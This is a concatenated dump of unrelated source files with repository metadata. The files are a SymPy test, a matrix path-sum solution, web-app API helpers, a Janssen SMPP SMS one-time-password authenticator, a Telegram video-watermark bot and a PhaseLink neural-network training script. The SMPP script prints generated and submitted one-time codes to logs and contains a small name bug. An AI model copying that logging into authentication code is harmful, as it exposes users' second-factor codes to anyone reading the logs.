def test_rischDE():
# TODO: Add more tests for rischDE, including ones from the text
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
DE.decrement_level()
assert rischDE(Poly(-2*x, x), Poly(1, x), Poly(1 - 2*x - 2*x**2, x),
Poly(1, x), DE) == \
(Poly(x + 1, x), Poly(1, x))
| 48.055838
| 158
| 0.509665
|
abf8001abf419f12bb86552f235a6560342c4b26
| 1,610
|
py
|
Python
|
src/practices/practice/max_path _sum/script.py
|
rahul38888/coding_practice
|
8445c379310aa189147c4805c43bed80aa9e9fac
|
[
"Apache-2.0"
] | 1
|
2021-08-06T11:22:12.000Z
|
2021-08-06T11:22:12.000Z
|
src/practices/practice/max_path _sum/script.py
|
rahul38888/coding_practice
|
8445c379310aa189147c4805c43bed80aa9e9fac
|
[
"Apache-2.0"
] | null | null | null |
src/practices/practice/max_path _sum/script.py
|
rahul38888/coding_practice
|
8445c379310aa189147c4805c43bed80aa9e9fac
|
[
"Apache-2.0"
] | null | null | null |
# https://practice.geeksforgeeks.org/problems/path-in-matrix3805/1
# Approach is to iterate over each 0th row element and try to find the max path from there
# for any index save the longest cost path from there and reuse it
class Solution:
def recMaximumPath(self, N, m, index, cache):
if index[0] == N-1:
if cache[index[0]][index[1]] is None:
cache[index[0]][index[1]] = m[index[0]][index[1]]
return cache[index[0]][index[1]]
if cache[index[0]][index[1]] is not None:
return cache[index[0]][index[1]]
max_cost = 0
r = index[0]
c = index[1]
max_cost = max(max_cost,self.recMaximumPath(N, m, (r+1, c), cache))
if c-1 >= 0:
max_cost = max(max_cost,self.recMaximumPath(N, m, (r+1, c-1), cache))
if c+1 < N:
max_cost = max(max_cost,self.recMaximumPath(N, m, (r+1, c+1), cache))
cache[index[0]][index[1]] = max_cost + m[index[0]][index[1]]
return cache[index[0]][index[1]]
def maximumPath(self, N, Matrix):
cache = [[None for i in range(N)] for i in range(N)]
max_cost = 0
for i in range(N):
max_cost = max(max_cost,self.recMaximumPath(N, Matrix,(0,i),cache))
return max_cost
if __name__ == '__main__':
t = int (input ())
for _ in range (t):
N = int(input())
arr = input().split()
Matrix = [[0]*N for i in range(N)]
for itr in range(N*N):
Matrix[(itr//N)][itr%N] = int(arr[itr])
ob = Solution()
print(ob.maximumPath(N, Matrix))
| 33.541667
| 90
| 0.557143
|
8ff9e22a75b6e29f339ba26dddde9b19e93abc82
| 2,652
|
py
|
Python
|
www/apis.py
|
xiaozefeng/python3-webapp
|
126f93179186bcf6adf360c0fba3ab51baa4ca19
|
[
"MIT"
] | null | null | null |
www/apis.py
|
xiaozefeng/python3-webapp
|
126f93179186bcf6adf360c0fba3ab51baa4ca19
|
[
"MIT"
] | null | null | null |
www/apis.py
|
xiaozefeng/python3-webapp
|
126f93179186bcf6adf360c0fba3ab51baa4ca19
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'steven'
'''
JSON API definition.
'''
import json, logging, inspect, functools
class Page(object):
'''
Page object for display pages.
'''
def __init__(self, item_count, page_index=1, page_size=10):
'''
Init Pagination by item_count, page_index and page_size.
>>> p1 = Page(100, 1)
>>> p1.page_count
10
>>> p1.offset
0
>>> p1.limit
10
>>> p2 = Page(90, 9, 10)
>>> p2.page_count
9
>>> p2.offset
80
>>> p2.limit
10
>>> p3 = Page(91, 10, 10)
>>> p3.page_count
10
>>> p3.offset
90
>>> p3.limit
10
'''
self.item_count = item_count
self.page_size = page_size
self.page_count = item_count // page_size + (1 if item_count % page_size > 0 else 0)
if (item_count == 0) or (page_index > self.page_count):
self.offset = 0
self.limit = 0
self.page_index = 1
else:
self.page_index = page_index
self.offset = self.page_size * (page_index - 1)
self.limit = self.page_size
self.has_next = self.page_index < self.page_count
self.has_previous = self.page_index > 1
def __str__(self):
return 'item_count: %s, page_count: %s, page_index: %s, page_size: %s, offset: %s, limit: %s' % (self.item_count, self.page_count, self.page_index, self.page_size, self.offset, self.limit)
__repr__ = __str__
class APIError(Exception):
'''
the base APIError which contains error(required), data(optional) and message(optional).
'''
def __init__(self, error, data='', message=''):
super(APIError, self).__init__(message)
self.error = error
self.data = data
self.message = message
class APIValueError(APIError):
'''
Indicate the input value has erro or invalid. The data specifies the error field of input form.
'''
def __init__(self, field, message):
super(APIValueError,self).__init__('value:invalid', field, message)
class APIResourceNotFoundError(APIError):
'''
Indicate the resource was not found. The data specifies the resource name.
'''
def __init__(self, field, message=''):
super(APIResourceNotFoundError, self).__init__('value:notfound', field, message)
class APIPermissionError(APIError):
'''
Indicate the api has no permission
'''
def __init__(self, message= ''):
super(APIPermissionError, self).__init__('permission:forbidden', 'permission', message)
| 27.625
| 196
| 0.592383
|
828550264cd13d6cdafa6dea1649bf77dcf660d8
| 16,464
|
py
|
Python
|
server/integrations/smpp/smpp2FA.py
|
duttarnab/jans-auth-server
|
c74d4b1056cc6ae364dee1d3b89121925a3dcd0b
|
[
"Apache-2.0"
] | 30
|
2020-10-08T07:42:25.000Z
|
2022-01-14T08:28:54.000Z
|
server/integrations/smpp/smpp2FA.py
|
duttarnab/jans-auth-server
|
c74d4b1056cc6ae364dee1d3b89121925a3dcd0b
|
[
"Apache-2.0"
] | 339
|
2020-10-23T19:07:38.000Z
|
2022-01-14T08:27:47.000Z
|
server/integrations/smpp/smpp2FA.py
|
duttarnab/jans-auth-server
|
c74d4b1056cc6ae364dee1d3b89121925a3dcd0b
|
[
"Apache-2.0"
] | 17
|
2020-10-07T17:23:59.000Z
|
2022-01-14T09:28:21.000Z
|
# Janssen Project software is available under the Apache License (2004). See http://www.apache.org/licenses/ for full text.
# Copyright (c) 2020, Janssen Project
# Copyright (c) 2019, Tele2
# Author: Jose Gonzalez
# Author: Gasmyr Mougang
# Author: Stefan Andersson
from java.util import Arrays, Date
from java.io import IOException
from java.lang import Enum
from io.jans.service.cdi.util import CdiUtil
from io.jans.as.server.security import Identity
from io.jans.model.custom.script.type.auth import PersonAuthenticationType
from io.jans.as.server.service import AuthenticationService
from io.jans.as.server.service.common import UserService
from io.jans.as.server.util import ServerUtil
from io.jans.util import StringHelper, ArrayHelper
from javax.faces.application import FacesMessage
from io.jans.jsf2.message import FacesMessages
from org.jsmpp import InvalidResponseException, PDUException
from org.jsmpp.bean import Alphabet, BindType, ESMClass, GeneralDataCoding, MessageClass, NumberingPlanIndicator, RegisteredDelivery, SMSCDeliveryReceipt, TypeOfNumber
from org.jsmpp.extra import NegativeResponseException, ResponseTimeoutException
from org.jsmpp.session import BindParameter, SMPPSession
from org.jsmpp.util import AbsoluteTimeFormatter, TimeFormatter
import random
class SmppAttributeError(Exception):
pass
class PersonAuthentication(PersonAuthenticationType):
def __init__(self, currentTimeMillis):
self.currentTimeMillis = currentTimeMillis
self.identity = CdiUtil.bean(Identity)
def get_and_parse_smpp_config(self, config, attribute, _type = None, convert = False, optional = False, default_desc = None):
try:
value = config.get(attribute).getValue2()
except:
if default_desc:
default_desc = " using default '{}'".format(default_desc)
else:
default_desc = ""
if optional:
raise SmppAttributeError("SMPP missing optional configuration attribute '{}'{}".format(attribute, default_desc))
else:
raise SmppAttributeError("SMPP missing required configuration attribute '{}'".format(attribute))
if _type and issubclass(_type, Enum):
try:
return getattr(_type, value)
except AttributeError:
raise SmppAttributeError("SMPP could not find attribute '{}' in {}".format(attribute, _type))
if convert:
try:
value = int(value)
except AttributeError:
try:
value = int(value, 16)
except AttributeError:
raise SmppAttributeError("SMPP could not parse value '{}' of attribute '{}'".format(value, attribute))
return value
def init(self, customScript, configurationAttributes):
print("SMPP Initialization")
self.TIME_FORMATTER = AbsoluteTimeFormatter()
self.SMPP_SERVER = None
self.SMPP_PORT = None
self.SYSTEM_ID = None
self.PASSWORD = None
# Setup some good defaults for TON, NPI and source (from) address
# TON (Type of Number), NPI (Number Plan Indicator)
self.SRC_ADDR_TON = TypeOfNumber.ALPHANUMERIC # Alphanumeric
self.SRC_ADDR_NPI = NumberingPlanIndicator.ISDN # ISDN (E163/E164)
self.SRC_ADDR = "Gluu OTP"
# Don't touch these unless you know what your doing, we don't handle number reformatting for
# any other type than international.
self.DST_ADDR_TON = TypeOfNumber.INTERNATIONAL # International
self.DST_ADDR_NPI = NumberingPlanIndicator.ISDN # ISDN (E163/E164)
# Priority flag and data_coding bits
self.PRIORITY_FLAG = 3 # Very Urgent (ANSI-136), Emergency (IS-95)
self.DATA_CODING_ALPHABET = Alphabet.ALPHA_DEFAULT # SMS default alphabet
self.DATA_CODING_MESSAGE_CLASS = MessageClass.CLASS1 # EM (Mobile Equipment (mobile memory), normal message
# Required server settings
try:
self.SMPP_SERVER = self.get_and_parse_smpp_config(configurationAttributes, "smpp_server")
except SmppAttributeError as e:
print(e)
try:
self.SMPP_PORT = self.get_and_parse_smpp_config(configurationAttributes, "smpp_port", convert = True)
except SmppAttributeError as e:
print(e)
if None in (self.SMPP_SERVER, self.SMPP_PORT):
print("SMPP smpp_server and smpp_port is empty, will not enable SMPP service")
return False
# Optional system_id and password for bind auth
try:
self.SYSTEM_ID = self.get_and_parse_smpp_config(configurationAttributes, "system_id", optional = True)
except SmppAttributeError as e:
print(e)
try:
self.PASSWORD = self.get_and_parse_smpp_config(configurationAttributes, "password", optional = True)
except SmppAttributeError as e:
print(e)
if None in (self.SYSTEM_ID, self.PASSWORD):
print("SMPP Authentication disabled")
# From number and to number settings
try:
self.SRC_ADDR_TON = self.get_and_parse_smpp_config(
configurationAttributes,
"source_addr_ton",
_type = TypeOfNumber,
optional = True,
default_desc = self.SRC_ADDR_TON
)
except SmppAttributeError as e:
print(e)
try:
self.SRC_ADDR_NPI = self.get_and_parse_smpp_config(
configurationAttributes,
"source_addr_npi",
_type = NumberingPlanIndicator,
optional = True,
default_desc = self.SRC_ADDR_NPI
)
except SmppAttributeError as e:
print(e)
try:
self.SRC_ADDR = self.get_and_parse_smpp_config(
configurationAttributes,
"source_addr",
optional = True,
default_desc = self.SRC_ADDR
)
except SmppAttributeError as e:
print(e)
try:
self.DST_ADDR_TON = self.get_and_parse_smpp_config(
configurationAttributes,
"dest_addr_ton",
_type = TypeOfNumber,
optional = True,
default_desc = self.DST_ADDR_TON
)
except SmppAttributeError as e:
print(e)
try:
self.DST_ADDR_NPI = self.get_and_parse_smpp_config(
configurationAttributes,
"dest_addr_npi",
_type = NumberingPlanIndicator,
optional = True,
default_desc = self.DST_ADDR_NPI
)
except SmppAttributeError as e:
print(e)
# Priority flag and data coding, don't touch these unless you know what your doing...
try:
self.PRIORITY_FLAG = self.get_and_parse_smpp_config(
configurationAttributes,
"priority_flag",
convert = True,
optional = True,
default_desc = "3 (Very Urgent, Emergency)"
)
except SmppAttributeError as e:
print(e)
try:
self.DATA_CODING_ALPHABET = self.get_and_parse_smpp_config(
configurationAttributes,
"data_coding_alphabet",
_type = Alphabet,
optional = True,
default_desc = self.DATA_CODING_ALPHABET
)
except SmppAttributeError as e:
print(e)
try:
self.DATA_CODING_MESSAGE_CLASS = self.get_and_parse_smpp_config(
configurationAttributes,
"data_coding_alphabet",
_type = MessageClass,
optional = True,
default_desc = self.DATA_CODING_MESSAGE_CLASS
)
except SmppAttributeError as e:
print(e)
print("SMPP Initialized successfully")
return True
def destroy(self, configurationAttributes):
print("SMPP Destroy")
print("SMPP Destroyed successfully")
return True
def getApiVersion(self):
return 11
def getAuthenticationMethodClaims(self, requestParameters):
return None
def isValidAuthenticationMethod(self, usageType, configurationAttributes):
return True
def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
return None
def authenticate(self, configurationAttributes, requestParameters, step):
userService = CdiUtil.bean(UserService)
authenticationService = CdiUtil.bean(AuthenticationService)
facesMessages = CdiUtil.bean(FacesMessages)
facesMessages.setKeepMessages()
session_attributes = self.identity.getSessionId().getSessionAttributes()
form_passcode = ServerUtil.getFirstValue(requestParameters, "passcode")
print("SMPP form_response_passcode: {}".format(str(form_passcode)))
if step == 1:
print("SMPP Step 1 Password Authentication")
credentials = self.identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
logged_in = False
if StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password):
logged_in = authenticationService.authenticate(user_name, user_password)
if not logged_in:
return False
# Get the Person's number and generate a code
foundUser = None
try:
foundUser = authenticationService.getAuthenticatedUser()
except:
print("SMPP Error retrieving user {} from LDAP".format(user_name))
return False
mobile_number = None
try:
isVerified = foundUser.getAttribute("phoneNumberVerified")
if isVerified:
mobile_number = foundUser.getAttribute("employeeNumber")
if not mobile_number:
mobile_number = foundUser.getAttribute("mobile")
if not mobile_number:
mobile_number = foundUser.getAttribute("telephoneNumber")
if not mobile_number:
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Failed to determine mobile phone number")
print("SMPP Error finding mobile number for user '{}'".format(user_name))
return False
except Exception as e:
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Failed to determine mobile phone number")
print("SMPP Error finding mobile number for {}: {}".format(user_name, e))
return False
# Generate Random six digit code
code = random.randint(100000, 999999)
# Get code and save it in LDAP temporarily with special session entry
self.identity.setWorkingParameter("code", code)
self.identity.setWorkingParameter("mobile_number", mobile_number)
self.identity.getSessionId().getSessionAttributes().put("mobile_number", mobile_number)
if not self.sendMessage(mobile_number, str(code)):
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Failed to send message to mobile phone")
return False
return True
elif step == 2:
# Retrieve the session attribute
print("SMPP Step 2 SMS/OTP Authentication")
code = session_attributes.get("code")
print("SMPP Code: {}".format(str(code)))
if code is None:
print("SMPP Failed to find previously sent code")
return False
if form_passcode is None:
print("SMPP Passcode is empty")
return False
if len(form_passcode) != 6:
print("SMPP Passcode from response is not 6 digits: {}".format(form_passcode))
return False
if form_passcode == code:
print("SMPP SUCCESS! User entered the same code!")
return True
print("SMPP failed, user entered the wrong code! {} != {}".format(form_passcode, code))
facesMessages.add(facesMessage.SEVERITY_ERROR, "Incorrect SMS code, please try again.")
return False
print("SMPP ERROR: step param not found or != (1|2)")
return False
def prepareForStep(self, configurationAttributes, requestParameters, step):
if step == 1:
print("SMPP Prepare for Step 1")
return True
elif step == 2:
print("SMPP Prepare for Step 2")
return True
return False
def getExtraParametersForStep(self, configurationAttributes, step):
if step == 2:
return Arrays.asList("code")
return None
def getCountAuthenticationSteps(self, configurationAttributes):
return 2
def getPageForStep(self, configurationAttributes, step):
if step == 2:
return "/auth/otp_sms/otp_sms.xhtml"
return ""
def getNextStep(self, configurationAttributes, requestParameters, step):
return -1
def getLogoutExternalUrl(self, configurationAttributes, requestParameters):
print "Get external logout URL call"
return None
def logout(self, configurationAttributes, requestParameters):
return True
def sendMessage(self, number, code):
status = False
session = SMPPSession()
session.setTransactionTimer(10000)
# We only handle international destination number reformatting.
# All others may vary by configuration decisions taken on SMPP
# server side which we have no clue about.
if self.DST_ADDR_TON == TypeOfNumber.INTERNATIONAL and number.startswith("+"):
number = number[1:]
try:
print("SMPP Connecting")
reference_id = session.connectAndBind(
self.SMPP_SERVER,
self.SMPP_PORT,
BindParameter(
BindType.BIND_TX,
self.SYSTEM_ID,
self.PASSWORD,
None,
self.SRC_ADDR_TON,
self.SRC_ADDR_NPI,
None
)
)
print("SMPP Connected to server with system id {}".format(reference_id))
try:
message_id = session.submitShortMessage(
"CMT",
self.SRC_ADDR_TON,
self.SRC_ADDR_NPI,
self.SRC_ADDR,
self.DST_ADDR_TON,
self.DST_ADDR_NPI,
number,
ESMClass(),
0,
self.PRIORITY_FLAG,
self.TIME_FORMATTER.format(Date()),
None,
RegisteredDelivery(SMSCDeliveryReceipt.DEFAULT),
0,
GeneralDataCoding(
self.DATA_CODING_ALPHABET,
self.DATA_CODING_MESSAGE_CLASS,
False
),
0,
code
)
print("SMPP Message '{}' sent to #{} with message id {}".format(code, number, message_id))
status = True
except PDUException as e:
print("SMPP Invalid PDU parameter: {}".format(e))
except ResponseTimeoutException as e:
print("SMPP Response timeout: {}".format(e))
except InvalidResponseException as e:
print("SMPP Receive invalid response: {}".format(e))
except NegativeResponseException as e:
print("SMPP Receive negative response: {}".format(e))
except IOException as e:
print("SMPP IO error occured: {}".format(e))
finally:
session.unbindAndClose()
except IOException as e:
print("SMPP Failed connect and bind to host: {}".format(e))
return status
| 37.848276
| 167
| 0.599551
|
b80a9efe6a9cec153604e620450ba8f39414b7bd
| 2,820
|
py
|
Python
|
telewater/bot.py
|
someoneonearthwholovestg/telewater
|
ced6810f60b6070d6de4637450a1ea87076e9b1d
|
[
"MIT"
] | 1
|
2021-04-26T07:12:47.000Z
|
2021-04-26T07:12:47.000Z
|
telewater/bot.py
|
someoneonearthwholovestg/telewater
|
ced6810f60b6070d6de4637450a1ea87076e9b1d
|
[
"MIT"
] | null | null | null |
telewater/bot.py
|
someoneonearthwholovestg/telewater
|
ced6810f60b6070d6de4637450a1ea87076e9b1d
|
[
"MIT"
] | null | null | null |
''' This module defines the functions that handle different events.
'''
import os
import logging
from telethon import TelegramClient, events
from telewater.settings import API_ID, API_HASH, HELP, X_OFF, Y_OFF
from telewater.watermark import watermark
from telewater.utils import download_image, get_args
# TODO: (optional) send logs to attached logs channel
async def start(event):
# TODO: authentication for admins and users via deep linking, or "enter your access code"
await event.respond('Hi! I am alive.')
raise events.StopPropagation
async def bot_help(event):
try:
await event.respond(HELP)
finally:
raise events.StopPropagation
async def set_image(event):
# TODO: accept images directly besides urls
# TODO: show preview on different sizes
# TODO: allow image resize / compress/ transparent bkrnd
try:
image_url = get_args(event.message.text)
# TODO: if args are empty, ask follow up question to get user-input
download_image(image_url, 'image.png')
await event.respond('Done')
finally:
raise events.StopPropagation
async def set_pos(event):
try:
pos_arg = get_args(event.message.text)
# TODO: if the pos args are empty, ask follow up question to get user-input of standard postions (TOP/BOTTOM ...)
# specific pos must be supplied thru args
global X_OFF, Y_OFF
X_OFF, Y_OFF = pos_arg.split('*')
await event.respond(f'X_OFF = {X_OFF} and Y_OFF = {Y_OFF}')
finally:
raise events.StopPropagation
async def watermarker(event):
# TODO: reject large files (above certain file limit)
# TODO: also watermark photos
if event.gif or event.video:
mp4_file = await event.download_media('')
# TODO: suffix the downloaded media with time-stamp and user id
outf = watermark(mp4_file, X_OFF, Y_OFF)
print(outf)
await event.client.send_file(event.sender_id, outf)
os.remove(mp4_file)
os.remove(outf)
# TODO: fetch information about bot name
# TODO:set the bot commands
# client(functions.bots.SetBotCommandsRequest(
# commands=[types.BotCommand(
# command='some string here',
# description='some string here'
# )]
# ))
# client.run_until_disconnected()
ALL_EVENTS = {
'start': (start, events.NewMessage(pattern='/start')),
'help': (bot_help, events.NewMessage(pattern='/help')),
'set_image': (set_image, events.NewMessage(pattern='/setimg')),
'set_pos': (set_pos, events.NewMessage(pattern='/setpos')),
'watermarker': (watermarker, events.NewMessage())
}
# this is a dictionary where the keys are the unique string identifier for the events
# the values are a tuple consisting of callback function and event
| 30.652174
| 121
| 0.684043
|
ad0e82216ee48bac4b6fac602fb1d3cac8949b48
| 15,294
|
py
|
Python
|
phaselink_train.py
|
TomSHudson/PhaseLink
|
04ad6e4b1c1c1ec809efb706f20a2702f04a6923
|
[
"MIT"
] | 2
|
2021-09-30T12:18:53.000Z
|
2021-10-01T02:32:40.000Z
|
phaselink_train.py
|
TomSHudson/PhaseLink
|
04ad6e4b1c1c1ec809efb706f20a2702f04a6923
|
[
"MIT"
] | null | null | null |
phaselink_train.py
|
TomSHudson/PhaseLink
|
04ad6e4b1c1c1ec809efb706f20a2702f04a6923
|
[
"MIT"
] | 1
|
2021-09-30T12:28:45.000Z
|
2021-09-30T12:28:45.000Z
|
#!/usr/bin/python
#-----------------------------------------------------------------------------------------------------------------------------------------
# PhaseLink: Earthquake phase association with deep learning
# Author: Zachary E. Ross
# Seismological Laboratory
# California Institute of Technology
# Script Description:
# Script to train a stacked bidirectional GRU model to link phases together. This code takes the synthetic training dataset produced using p
# haselink_dataset and trains a deep neural network to associate individual phases into events.
# Usage:
# python phaselink_train.py config_json
# For example: python phaselink_train.py params.json
#-----------------------------------------------------------------------------------------------------------------------------------------
# Import neccessary modules:
import numpy as np
import os
import torch
import torch.utils.data
import sys
import json
import pickle
import glob
import gc
import matplotlib.pyplot as plt
from torch.utils.data.sampler import SubsetRandomSampler
#----------------------------------------------- Define main functions -----------------------------------------------
class MyDataset(torch.utils.data.Dataset):
"""Function to preprocess a dataset into the format required by
pytorch for training."""
def __init__(self, data, target, device, transform=None):
self.data = torch.from_numpy(data).float().to(device)
self.target = torch.from_numpy(target).short().to(device)
self.transform = transform
def __getitem__(self, index):
x = self.data[index]
y = self.target[index]
if self.transform:
x = self.transform(x)
return x, y
def __len__(self):
return len(self.data)
class StackedGRU(torch.nn.Module):
"""Class defining the stacked bidirectional GRU network."""
def __init__(self):
super(StackedGRU, self).__init__()
self.hidden_size = 128
self.fc1 = torch.nn.Linear(5, 32)
self.fc2 = torch.nn.Linear(32, 32)
self.fc3 = torch.nn.Linear(32, 32)
self.fc4 = torch.nn.Linear(32, 32)
self.fc5 = torch.nn.Linear(32, 32)
self.fc6 = torch.nn.Linear(2*self.hidden_size, 1)
self.gru1 = torch.nn.GRU(32, self.hidden_size, \
batch_first=True, bidirectional=True)
self.gru2 = torch.nn.GRU(self.hidden_size*2, self.hidden_size, \
batch_first=True, bidirectional=True)
def forward(self, inp):
out = self.fc1(inp)
out = torch.nn.functional.relu(out)
out = self.fc2(out)
out = torch.nn.functional.relu(out)
out = self.fc3(out)
out = torch.nn.functional.relu(out)
out = self.fc4(out)
out = torch.nn.functional.relu(out)
out = self.fc5(out)
out = torch.nn.functional.relu(out)
out = self.gru1(out)
h_t = out[0]
out = self.gru2(h_t)
h_t = out[0]
out = self.fc6(h_t)
#out = torch.sigmoid(out)
return out
class Model():
"""Class to create and train a bidirectional GRU model."""
def __init__(self, network, optimizer, model_path):
self.network = network
self.optimizer = optimizer
self.model_path = model_path
def train(self, train_loader, val_loader, n_epochs, enable_amp=False):
"""Function to perform the training of a bidirectional GRU model.
Loads and trains the data."""
from torch.autograd import Variable
import time
if enable_amp:
import apex.amp as amp
#pos_weight = torch.ones([1]).to(device)*24.264966334432359
#loss = torch.nn.BCEWithLogitsLoss(pos_weight=pos_weight)
loss = torch.nn.BCEWithLogitsLoss()
#loss = torch.nn.BCELoss()
n_batches = len(train_loader)
training_start_time = time.time()
for epoch in range(n_epochs):
running_loss = 0.0
running_acc = 0
running_val_acc = 0
print_every = n_batches // 10
start_time = time.time()
total_train_loss = 0
total_val_loss = 0
total_val_acc = 0
running_sample_count = 0
for i, data in enumerate(train_loader, 0):
# Get inputs/outputs and wrap in variable object
inputs, labels = data
#inputs = inputs.to(device)
#labels = labels.to(device)
# Set gradients for all parameters to zero
self.optimizer.zero_grad()
# Forward pass
outputs = self.network(inputs)
# Backward pass
outputs = outputs.view(-1)
labels = labels.view(-1)
if enable_amp:
loss_ = loss(outputs, labels.float())
with amp.scale_loss(loss_, self.optimizer) as loss_value:
loss_value.backward()
else:
loss_value = loss(outputs, labels.float())
loss_value.backward()
# Update parameters
self.optimizer.step()
with torch.no_grad():
# Print statistics
running_loss += loss_value.data.item()
total_train_loss += loss_value.data.item()
# Calculate categorical accuracy
pred = torch.round(torch.sigmoid(outputs)).short()
running_acc += (pred == labels).sum().item()
running_sample_count += len(labels)
# Print every 10th batch of an epoch
if (i + 1) % (print_every + 1) == 0:
print("Epoch {}, {:d}% \t train_loss: {:.4e} "
"train_acc: {:4.2f}% took: {:.2f}s".format(
epoch + 1, int(100 * (i + 1) / n_batches),
running_loss / print_every,
100*running_acc / running_sample_count,
time.time() - start_time))
# Reset running loss and time
running_loss = 0.0
start_time = time.time()
running_sample_count = 0
y_pred_all, y_true_all = [], []
prec_0 = 0
prec_n_0 = 0
prec_1 = 0
prec_n_1 = 0
reca_0 = 0
reca_n_0 = 0
reca_1 = 0
reca_n_1 = 0
pick_precision = 0
pick_recall = 0
with torch.no_grad():
for inputs, labels in val_loader:
# Wrap tensors in Variables
#inputs = inputs.to(device)
#labels = labels.to(device)
# Forward pass only
val_outputs = self.network(inputs)
val_outputs = val_outputs.view(-1)
labels = labels.view(-1)
val_loss = loss(val_outputs, labels.float())
total_val_loss += val_loss.data.item()
# Calculate categorical accuracy
y_pred = torch.round(torch.sigmoid(val_outputs)).short()
running_val_acc += (y_pred == labels).sum().item()
running_sample_count += len(labels)
#y_pred_all.append(pred.cpu().numpy().flatten())
#y_true_all.append(labels.cpu().numpy().flatten())
y_true = labels
# Get precision-recall for current validation epoch:
prec_0 += (
y_pred[y_pred<0.5] == y_true[y_pred<0.5]
).sum().item()
prec_1 += (
y_pred[y_pred>0.5] == y_true[y_pred>0.5]
).sum().item()
reca_0 += (
y_pred[y_true<0.5] == y_true[y_true<0.5]
).sum().item()
reca_1 += (
y_pred[y_true>0.5] == y_true[y_true>0.5]
).sum().item()
prec_n_0 += torch.numel(y_pred[y_pred<0.5])
prec_n_1 += torch.numel(y_pred[y_pred>0.5])
reca_n_0 += torch.numel(y_true[y_true<0.5])
reca_n_1 += torch.numel(y_true[y_true>0.5])
# Check if any are zero, and if so, set to 1 sample, simply so doesn't crash:
# (Note: Just effects printing output)
if prec_n_0 == 0:
prec_n_0 = 1
if prec_n_1 == 0:
prec_n_1 = 1
if reca_n_0 == 0:
reca_n_0 = 1
if reca_n_1 == 0:
reca_n_1 = 1
print("Precision (Class 0): {:4.3f}".format(prec_0/prec_n_0))
print("Recall (Class 0): {:4.3f}".format(reca_0/reca_n_0))
print("Precision (Class 1): {:4.3f}".format(prec_1/prec_n_1))
print("Recall (Class 1): {:4.3f}".format(reca_1/reca_n_1))
#y_pred_all = np.concatenate(y_pred_all)
#y_true_all = np.concatenate(y_true_all)
#from sklearn.metrics import classification_report
#print(classification_report(y_true_all, y_pred_all))
total_val_loss /= len(val_loader)
total_val_acc = running_val_acc / running_sample_count
print(
"Validation loss = {:.4e} acc = {:4.2f}%".format(
total_val_loss,
100*total_val_acc))
# Save model:
os.makedirs(self.model_path, exist_ok=True)
torch.save({
'epoch': epoch,
'model_state_dict': self.network.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'loss': total_val_loss,
}, '%s/model_%03d_%f.pt' % (self.model_path, epoch, total_val_loss))
print(
"Training finished, took {:.2f}s".format(
time.time() -
training_start_time))
def predict(self, data_loader):
from torch.autograd import Variable
import time
for inputs, labels in val_loader:
# Wrap tensors in Variables
inputs, labels = Variable(
inputs.to(device)), Variable(
labels.to(device))
# Forward pass only
val_outputs = self.network(inputs)
def find_best_model(model_path="phaselink_model"):
"""Function to find best model.
Note: Currently uses a very basic selection method."""
# Plot model training and validation loss to select best model:
# Write the models loss function values to file:
models_fnames = list(glob.glob(os.path.join(model_path, "model_???_*.pt")))
models_fnames.sort()
val_losses = []
f_out = open(os.path.join(model_path, 'val_losses.txt'), 'w')
for model_fname in models_fnames:
model_curr = torch.load(model_fname)
val_losses.append(model_curr['loss'])
f_out.write(' '.join((model_fname, str(model_curr['loss']), '\n')))
del(model_curr)
gc.collect()
f_out.close()
val_losses = np.array(val_losses)
print("Written losses to file: ", os.path.join(model_path, 'val_losses.txt'))
# And select approximate best model (approx corner of loss curve):
approx_corner_idx = np.argwhere(val_losses < np.average(val_losses))[0][0]
print("Model to use:", models_fnames[approx_corner_idx])
# And plot:
plt.figure()
plt.plot(np.arange(len(val_losses)), val_losses)
plt.hlines(val_losses[approx_corner_idx], 0, len(val_losses), color='r', ls="--")
plt.ylabel("Val loss")
plt.xlabel("Epoch")
plt.show()
# And convert model to use to universally usable format (GPU or CPU):
model = StackedGRU().cuda(device)
checkpoint = torch.load(models_fnames[approx_corner_idx], map_location=device)
model.load_state_dict(checkpoint['model_state_dict'])
torch.save(model, os.path.join(model_path, 'model_to_use.gpu.pt'), _use_new_zipfile_serialization=False)
new_device = "cpu"
model = model.to(new_device)
torch.save(model, os.path.join(model_path, 'model_to_use.cpu.pt'), _use_new_zipfile_serialization=False)
del model
gc.collect()
print("Found best model and written out to", model_path, "for GPU and CPU.")
#----------------------------------------------- End: Define main functions -----------------------------------------------
#----------------------------------------------- Run script -----------------------------------------------
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python phaselink_train.py config_json")
print("E.g. python phaselink_train.py params.json")
sys.exit()
with open(sys.argv[1], "r") as f:
params = json.load(f)
# Get device (cpu vs gpu) specified:
device = torch.device(params["device"])
if params["device"][0:4] == "cuda":
torch.cuda.empty_cache()
enable_amp = True
else:
enable_amp = False
if enable_amp:
import apex.amp as amp
# Get training info from param file:
n_epochs = params["n_epochs"] #100
# Load in training dataset:
X = np.load(params["training_dset_X"])
Y = np.load(params["training_dset_Y"])
print("Training dataset info:")
print("Shape of X:", X.shape, "Shape of Y", Y.shape)
dataset = MyDataset(X, Y, device)
# Get dataset info:
n_samples = len(dataset)
indices = list(range(n_samples))
# Set size of training and validation subset:
n_test = int(0.1*X.shape[0])
validation_idx = np.random.choice(indices, size=n_test, replace=False)
train_idx = list(set(indices) - set(validation_idx))
# Specify samplers:
train_sampler = SubsetRandomSampler(train_idx)
validation_sampler = SubsetRandomSampler(validation_idx)
# Load training data:
train_loader = torch.utils.data.DataLoader(
dataset,
batch_size=256,
shuffle=False,
sampler=train_sampler
)
val_loader = torch.utils.data.DataLoader(
dataset,
batch_size=1024,
shuffle=False,
sampler=validation_sampler
)
stackedgru = StackedGRU()
stackedgru = stackedgru.to(device)
#stackedgru = torch.nn.DataParallel(stackedgru,
# device_ids=['cuda:2', 'cuda:3', 'cuda:4', 'cuda:5'])
if enable_amp:
#amp.register_float_function(torch, 'sigmoid')
from apex.optimizers import FusedAdam
optimizer = FusedAdam(stackedgru.parameters())
stackedgru, optimizer = amp.initialize(
stackedgru, optimizer, opt_level='O2')
else:
optimizer = torch.optim.Adam(stackedgru.parameters())
